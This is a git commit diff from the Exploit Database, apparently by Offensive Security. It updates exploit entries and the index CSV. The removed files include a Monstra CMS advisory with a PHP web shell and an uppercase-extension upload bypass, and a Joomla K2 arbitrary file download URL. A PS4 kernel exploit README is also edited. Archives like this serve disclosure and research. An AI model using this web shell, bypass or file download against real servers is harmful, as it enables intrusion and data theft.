DB: 2018-03-02

9 changes to exploits/shellcodes

Nintendo Switch - WebKit Code Execution (PoC)

Nintendo Switch - WebKit Code Execution (PoC)

Monstra - Multiple HTML Injection Vulnerabilities
Monstra CMS 1.2.1 - Multiple HTML Injection Vulnerabilities

Monstra CMS - 'login' SQL Injection
Monstra CMS 1.2.0 - 'login' SQL Injection

Monstra CMS - Remote Code Execution

Joomla! Component K2 2.8.0 - Arbitrary File Download
This commit is contained in:
Offensive Security 2018-03-02 05:01:47 +00:00
parent 6885f2dcc7
commit b42c3d0ecd
6 changed files with 11 additions and 69 deletions

View file

@ -10,11 +10,15 @@ The following patches are made by default in the kernel ROP chain:
1) Disable kernel write protection
2) Allow RWX (read-write-execute) memory mapping
3) Syscall instruction allowed anywhere
4) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process
4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation.
## Notes
- Early stages, so no payloads yet, I may provide a debug menu payload later on in the day.
- Payloads from 4.05 should be fairly trivial to port unless they use hardcoded kernel offsets
- I've built in a patch so the kernel exploit will only run once on the system, you can make additional patches via payloads.
- A custom syscall is added (#11) to execute any RWX memory in kernel mode, this can be used to execute payloads that want to do fun things like jailbreaking and patching the kernel.
## Contributors
Massive credits to the following:
@ -23,4 +27,4 @@ Massive credits to the following:
- [Flatz](https://twitter.com/flat_z)
- Anonymous
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44196.zip
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44196-v2.zip

View file

@ -1,10 +1,10 @@
source: http://www.securityfocus.com/bid/55171/info
<!--source: http://www.securityfocus.com/bid/55171/info
Monstra is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Monstra 1.2.1 is vulnerable; other versions may also be affected.
Monstra 1.2.1 is vulnerable; other versions may also be affected. -->
<html>
<head>

View file

@ -1,37 +0,0 @@
## Vulnerabilities Summary
The following advisory describes a vulnerability found in Monstra CMS.
Monstra is “a modern and lightweight Content Management System. It is Easy to install, upgrade and use.”
The vulnerability found is a remote code execution vulnerability through an arbitrary file upload mechanism.
## Credit
An independent security researcher, Ishaq Mohammed, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
We were not able to get the vendor to respond in any way, the software appears to have been left abandoned without support though this is not an official status on their site (last official patch was released on 2012-11-29), the github appears a bit more active (last commit from 2 years ago).
Without any vendor response the researcher was kind enough to create a patch that addresses this bug, its available here: https://github.com/monstra-cms/monstra/issues/426
CVE: CVE-2017-18048
## Vulnerabilities details
An editor can upload files to the Monstra CMS and can access them by clicking on them from the administrator portal. The default setup of Monstra CMS allows uploading of files only with certain extensions, forbidding all types of executable files which are mentioned in monstra\plugins\box\filesmanager\filesmanager.admin.php. However by simply uploading a php file with “PHP” (all characters in uppercase) extension will bypass this mechanism and will allow an attacker to execute shell commands on the server.
## Proof of Concept
Steps to Reproduce:
Login with a valid credentials of an Editor
Select Files option from the Dropdown menu of Content
Upload a file with PHP (uppercase)extenstion contaiing the below code:
```
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
```
Click on Upload
liOnce the file is uploaded Click on the uploaded file and add ?cmd= to the URL followed by a system command such as whoami,time,date etc.

View file

@ -1,23 +0,0 @@
# # # #
# Exploit Title: Joomla! Component K2 2.8.0 - Arbitrary File Download
# Dork: N/A
# Date: 26.02.2018
# Vendor Homepage: http://www.joomlaworks.net/
# Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/content-construction/k2/
# Software Download: https://getk2.org/downloads/?f=K2_v2.8.0.zip
# Version: 2.8.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-7482
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# The vulnerability allows an users to arbitrary download files..
#
# 1)
# http://localhost/[PATH]/index.php?option=com_k2&view=media&task=connector&cmd=file&target=l1_[FILE_BASE64]&download=1&[TOKEN]=1
#
# # # #

View file

@ -5881,6 +5881,7 @@ id,file,description,date,author,type,platform,port
44197,exploits/hardware/dos/44197.md,"Sony Playstation 4 (PS4) 5.01 < 5.05 - WebKit Code Execution (PoC)",2018-02-27,ALEXZZZ9,dos,hardware,
44211,exploits/freebsd_x86-64/dos/44211.c,"FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
44213,exploits/hardware/dos/44213.html,"Nintendo Switch - WebKit Code Execution (PoC)",2017-03-12,qwertyoruiop,dos,hardware,
44215,exploits/multiple/dos/44215.m,"Apple iOS 11.2.5 / watchOS 4.2.2 / tvOS 11.2.5 - 'bluetoothd' Memory Corruption",2018-02-28,"Zimperium zLabs Team",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
@ -9554,7 +9555,6 @@ id,file,description,date,author,type,platform,port
44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux,
44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux,
44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader",2016-04-27,"Carlos Pizarro",local,hardware,
44213,exploits/hardware/local/44213.html,"Nintendo Switch - WebKit Code Execution (PoC)",2017-03-12,LiveOverflow,local,hardware,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -36029,7 +36029,7 @@ id,file,description,date,author,type,platform,port
37648,exploits/php/webapps/37648.txt,"Joomla! Component CiviCRM - Multiple Arbitrary File Upload Vulnerabilities",2012-08-22,Crim3R,webapps,php,
37649,exploits/php/webapps/37649.html,"SiNG cms - 'Password.php' Cross-Site Scripting",2012-08-23,LiquidWorm,webapps,php,
37650,exploits/php/webapps/37650.txt,"1024 CMS 2.1.1 - 'p' SQL Injection",2012-08-22,kallimero,webapps,php,
37651,exploits/php/webapps/37651.html,"Monstra - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,webapps,php,
37651,exploits/php/webapps/37651.html,"Monstra CMS 1.2.1 - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,webapps,php,
37652,exploits/php/webapps/37652.txt,"KindEditor - 'name' Cross-Site Scripting",2012-08-23,LiquidWorm,webapps,php,
37653,exploits/php/webapps/37653.txt,"WordPress Plugin Rich Widget - Arbitrary File Upload",2012-08-22,Crim3R,webapps,php,
37654,exploits/php/webapps/37654.txt,"WordPress Plugin Monsters Editor for WP Super Edit - Arbitrary File Upload",2012-08-22,Crim3R,webapps,php,
@ -36583,7 +36583,7 @@ id,file,description,date,author,type,platform,port
38765,exploits/php/webapps/38765.txt,"Horde Groupware 5.2.10 - Cross-Site Request Forgery",2015-11-19,"High-Tech Bridge SA",webapps,php,80
38767,exploits/php/webapps/38767.txt,"WordPress Plugin RokIntroScroller - 'thumb.php' Multiple Vulnerabilities",2013-09-19,MustLive,webapps,php,
38768,exploits/php/webapps/38768.txt,"WordPress Plugin RokMicroNews - 'thumb.php' Multiple Vulnerabilities",2013-09-19,MustLive,webapps,php,
38769,exploits/php/webapps/38769.txt,"Monstra CMS - 'login' SQL Injection",2013-09-20,linc0ln.dll,webapps,php,
38769,exploits/php/webapps/38769.txt,"Monstra CMS 1.2.0 - 'login' SQL Injection",2013-09-20,linc0ln.dll,webapps,php,
38770,exploits/php/webapps/38770.txt,"MentalJS - Sandbox Security Bypass",2013-09-20,"Rafay Baloch",webapps,php,
38773,exploits/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A / ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",webapps,hardware,
38781,exploits/php/webapps/38781.txt,"Alienvault Open Source SIEM (OSSIM) 3.1 - 'date_from' Multiple SQL Injections",2013-10-02,"Yu-Chi Ding",webapps,php,
@ -38118,7 +38118,6 @@ id,file,description,date,author,type,platform,port
44041,exploits/multiple/webapps/44041.txt,"Oracle Knowledge Management 12.1.1 < 12.2.5 - XML External Entity Leading To Remote Code Execution",2017-03-17,SecuriTeam,webapps,multiple,
44043,exploits/hardware/webapps/44043.md,"iBall WRA150N - Multiple Vulnerabilities",2018-01-29,SecuriTeam,webapps,hardware,
44044,exploits/php/webapps/44044.md,"GitStack - Unauthenticated Remote Code Execution",2018-01-15,SecuriTeam,webapps,php,
44045,exploits/php/webapps/44045.md,"Monstra CMS - Remote Code Execution",2017-12-06,SecuriTeam,webapps,php,
44050,exploits/php/webapps/44050.md,"Ametys CMS 4.0.2 - Unauthenticated Password Reset",2017-11-07,SecuriTeam,webapps,php,
44051,exploits/linux/webapps/44051.md,"DblTek - Multiple Vulnerabilities",2017-11-21,SecuriTeam,webapps,linux,
44054,exploits/linux/webapps/44054.md,"FiberHome - Directory Traversal",2017-10-13,SecuriTeam,webapps,linux,
@ -38932,7 +38931,6 @@ id,file,description,date,author,type,platform,port
44172,exploits/php/webapps/44172.txt,"Groupon Clone Script 3.0.2 - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,
44185,exploits/php/webapps/44185.txt,"Schools Alert Management Script 2.0.2 - Authentication Bypass",2018-02-27,"Prasenjit Kanti Paul",webapps,php,
44186,exploits/php/webapps/44186.txt,"MyBB My Arcade Plugin 1.3 - Cross-Site Scripting",2018-02-27,0xB9,webapps,php,
44188,exploits/php/webapps/44188.txt,"Joomla! Component K2 2.8.0 - Arbitrary File Download",2018-02-27,"Ihsan Sencan",webapps,php,
44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,
44192,exploits/php/webapps/44192.txt,"CMS Made Simple 2.1.6 - Remote Code Execution",2018-02-27,"Keerati T.",webapps,php,
44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,

Can't render this file because it is too large.